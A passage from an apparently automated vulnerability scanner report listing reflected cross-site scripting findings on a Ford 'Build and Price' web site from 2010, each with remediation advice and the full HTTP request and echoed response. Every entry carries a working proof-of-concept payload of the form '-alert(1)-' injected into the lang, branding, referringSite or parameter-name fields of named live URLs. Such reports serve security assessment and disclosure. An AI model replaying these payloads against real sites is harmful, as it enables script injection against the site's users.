'optimizedSlicingEnabled':'true'};


function defineRefreshVariable(){
pageR
...[SNIP]...

2.233. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-F-150/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95eea'-alert(1)-'dc7b173717f was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-F-150/ChooseYourPath/?branding=1&referringSite=1&lang=en95eea'-alert(1)-'dc7b173717f HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:58:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en95eea'-alert(1)-'dc7b173717f',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Trucks',
'Model':'F-150',
'Year':'2011',
'optimizedSlicingEnabled':'true'};


function defineRefreshVariab
...[SNIP]...

2.234. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-F-150/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4468'-alert(1)-'3ffe9118634 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-F-150/ChooseYourPath/?f4468'-alert(1)-'3ffe9118634=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121866

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...

var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'Page':'ChooseYourPath',
'skipIntro':'true',
'f4468'-alert(1)-'3ffe9118634':'1',
'Skin':'Trucks',
'Model':'F-150',
'Year':'2011',
'optimizedSlicingEnabled':'true'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.235. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-F-150/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f23'-alert(1)-'dc2b741c5ae was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-F-150/ChooseYourPath/?branding=1&referringSite=164f23'-alert(1)-'dc2b741c5ae&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'164f23'-alert(1)-'dc2b741c5ae',
'Skin':'Trucks',
'Model':'F-150',
'Year':'2011',
'optimizedSlicingEnabled':'true'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.236. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Fiesta/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b92'-alert(1)-'bbe24949dfa was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Fiesta/ChooseYourPath/?branding=1e6b92'-alert(1)-'bbe24949dfa&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1e6b92'-alert(1)-'bbe24949dfa',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Fiesta',
'Model':'Fiesta',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.237. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Fiesta/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 786fd'-alert(1)-'864ad91e168 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Fiesta/ChooseYourPath/?branding=1&referringSite=1&lang=en786fd'-alert(1)-'864ad91e168 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en786fd'-alert(1)-'864ad91e168',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Fiesta',
'Model':'Fiesta',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
...[SNIP]...

2.238. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Fiesta/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1820b'-alert(1)-'6e3b2f9d578 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Fiesta/ChooseYourPath/?1820b'-alert(1)-'6e3b2f9d578=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Sat, 20 Nov 2010 03:53:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121833

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
ue;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Fiesta',
'Model':'Fiesta',
'Year':'2011',
'1820b'-alert(1)-'6e3b2f9d578':'1'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.239. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Fiesta/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5199c'-alert(1)-'f93cd745cf5 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Fiesta/ChooseYourPath/?branding=1&referringSite=15199c'-alert(1)-'f93cd745cf5&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'15199c'-alert(1)-'f93cd745cf5',
'Skin':'Fiesta',
'Model':'Fiesta',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.240. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Flex/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d94b3'-alert(1)-'8c0de6b308c was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Flex/ChooseYourPath/?branding=1d94b3'-alert(1)-'8c0de6b308c&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1d94b3'-alert(1)-'8c0de6b308c',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Flex',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.241. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Flex/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 269b8'-alert(1)-'8f8a6573305 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Flex/ChooseYourPath/?branding=1&referringSite=1&lang=en269b8'-alert(1)-'8f8a6573305 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:59:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en269b8'-alert(1)-'8f8a6573305',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Flex',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;

...[SNIP]...

2.242. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Flex/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb8c8'-alert(1)-'d3013ecfaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Flex/ChooseYourPath/?eb8c8'-alert(1)-'d3013ecfaa3=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121841

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'eb8c8'-alert(1)-'d3013ecfaa3':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Flex',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.243. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Flex/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e49b'-alert(1)-'6d729410d56 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Flex/ChooseYourPath/?branding=1&referringSite=13e49b'-alert(1)-'6d729410d56&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:59:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'13e49b'-alert(1)-'6d729410d56',
'Skin':'Generic',
'Model':'Flex',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.244. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-FocusSedan/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d95'-alert(1)-'1ed415b9001 was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-FocusSedan/ChooseYourPath/?branding=1a8d95'-alert(1)-'1ed415b9001&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1a8d95'-alert(1)-'1ed415b9001',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Focus',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.245. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-FocusSedan/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ed5d'-alert(1)-'2e8193bf56 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-FocusSedan/ChooseYourPath/?branding=1&referringSite=1&lang=en6ed5d'-alert(1)-'2e8193bf56 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:55:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en6ed5d'-alert(1)-'2e8193bf56',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Focus',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
...[SNIP]...

2.246. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-FocusSedan/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f15f2'-alert(1)-'7b361827032 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-FocusSedan/ChooseYourPath/?f15f2'-alert(1)-'7b361827032=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'f15f2'-alert(1)-'7b361827032':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Focus',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.247. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-FocusSedan/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35b7b'-alert(1)-'12a2836c8d5 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-FocusSedan/ChooseYourPath/?branding=1&referringSite=135b7b'-alert(1)-'12a2836c8d5&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'135b7b'-alert(1)-'12a2836c8d5',
'Skin':'Generic',
'Model':'Focus',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.248. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Fusion/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b1a1'-alert(1)-'73c8afdffbd was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

